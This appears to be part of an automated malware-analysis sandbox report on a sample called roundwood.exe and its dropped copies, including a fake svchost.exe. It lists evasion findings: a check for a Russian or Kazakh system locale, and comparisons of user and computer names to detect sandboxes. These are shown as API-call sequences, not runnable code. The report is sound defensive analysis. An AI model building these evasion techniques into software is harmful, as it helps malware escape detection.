Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX

Malware Analysis System Evasion

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D048C0 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h	2_2_02D048C0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012E48C0 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h	4_2_012E48C0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E348C0 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h	5_2_00E348C0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E748C0 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h	8_2_00E748C0

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Desktop\roundwood.exe	Code function: GetModuleFileNameA,GetModuleFileNameA,strstr,strstr,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,	0_2_00403920
Source: C:\Users\user\Desktop\roundwood.exe	Code function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,	0_2_00402B70
Source: C:\Windows\apppatch\svchost.exe	Code function: GetModuleFileNameA,GetModuleFileNameA,strstr,strstr,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,	2_2_00403920
Source: C:\Windows\apppatch\svchost.exe	Code function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,	2_2_00402B70
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,IsUserAnAdmin,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,	2_2_02D167D0
Source: C:\Windows\apppatch\svchost.exe	Code function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,	2_2_02D15230
Source: C:\Windows\apppatch\svchost.exe	Code function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,	2_2_02D23B90
Source: C:\Windows\apppatch\svchost.exe	Code function: GetUserNameA,memset,StrStrIA,	2_2_02D1A8E0
Source: C:\Windows\apppatch\svchost.exe	Code function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,	2_2_02D221E0
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,	2_2_02D01170
Source: C:\Windows\apppatch\svchost.exe	Code function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,	2_2_02D21160
Source: C:\Windows\apppatch\svchost.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,	2_2_02D23910
Source: C:\Windows\apppatch\svchost.exe	Code function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,	2_2_02D1C900
Source: C:\Windows\apppatch\svchost.exe	Code function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,	2_2_02D01660
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,	2_2_02D227C0
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,	2_2_02D037E0
Source: C:\Windows\apppatch\svchost.exe	Code function: StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,	2_2_02D0D7A0
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetModuleFileNameA,StrStrIA,	2_2_02D22750
Source: C:\Windows\apppatch\svchost.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,	2_2_02D20F40
Source: C:\Windows\apppatch\svchost.exe	Code function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,	2_2_02D07D50
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,	4_2_012F67D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,	4_2_01303910
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,	4_2_012FC900
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,	4_2_01301160
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,	4_2_012E1170
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,	4_2_013021E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetUserNameA,memset,StrStrIA,	4_2_012FA8E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,	4_2_01303B90
